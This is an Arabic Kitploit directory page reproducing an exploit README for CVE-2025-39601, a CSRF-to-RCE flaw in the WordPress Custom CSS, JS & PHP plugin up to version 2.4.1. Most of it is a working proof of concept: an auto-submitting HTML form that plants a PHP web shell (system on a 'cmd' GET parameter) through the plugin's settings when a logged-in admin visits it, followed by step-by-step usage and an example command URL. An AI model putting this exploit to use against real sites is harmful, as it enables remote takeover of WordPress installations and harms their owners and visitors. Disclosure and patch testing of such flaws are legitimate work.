Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-39601 — إضافة WordPress Custom CSS, JS & PHP <= 2.4.1 - ثغرة CSRF إلى RCE | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-39601
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-39601

CVE-2025-39601

إضافة WordPress Custom CSS, JS & PHP <= 2.4.1 - ثغرة CSRF إلى RCE

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2025-39601 - CSRF إلى RCE في إضافة WordPress Custom CSS, JS & PHP الإصدار <= 2.4.1

🧠 الوصف

ثغرة Cross-Site Request Forgery (CSRF) في إضافة WPFactory Custom CSS, JS & PHP تسمح بـ تنفيذ التعليمات البرمجية عن بُعد (RCE) عن طريق حقن كود PHP خبيث عبر طلبات POST غير مصرح بها.
يؤثر هذا على جميع الإصدارات حتى 2.4.1 وما يشملها.

  • معرّف CVE: CVE-2025-39601
  • تاريخ النشر: 2025-04-16
  • تاريخ التحديث: 2025-04-16
  • الخطورة: 🔥 9.6 (حرجة)
  • CWE: CWE-352 - تزوير الطلبات عبر المواقع
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🖼️ إثبات مرئي

فيما يلي لقطة شاشة تعرض نتيجة استغلال ناجح، توضح كيفية تنفيذ التعليمات البرمجية عن بُعد عبر معامل URL:

Nxploited


Nxploited


💥 إثبات المفهوم (PoC)

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>

🧪 الاستخدام

  1. قم باستضافة ملف HTML أعلاه على أي خادم خارجي أو بيئة محلية.
  2. بينما يكون مستخدم بصلاحية مدير (admin) مسجلاً الدخول، قم بزيارة ملف HTML المستضاف في متصفحه.
  3. سيؤدي هذا إلى إرسال النموذج بصمت وحقن كود PHP في إعدادات الإضافة.
  4. يتم بعد ذلك تنفيذ الكود تلقائيًا عند كل تحميل صفحة عبر خطاف plugins_loaded.
  5. مثال على التنفيذ:
    root@kitploit:~
    http://target-site.com/?cmd=whoami
    

⚠️ إخلاء مسؤولية

إثبات المفهوم هذا هو لأغراض تعليمية فقط.
المؤلف ليس مسؤولاً عن أي إساءة استخدام أو ضرر ناتج عن تطبيق هذه المعلومات بشكل غير صحيح.
اختبر دائمًا في بيئات محكومة وبإذن.


بواسطة: Nxploited | Khaled Alenazi

تنزيل الأداة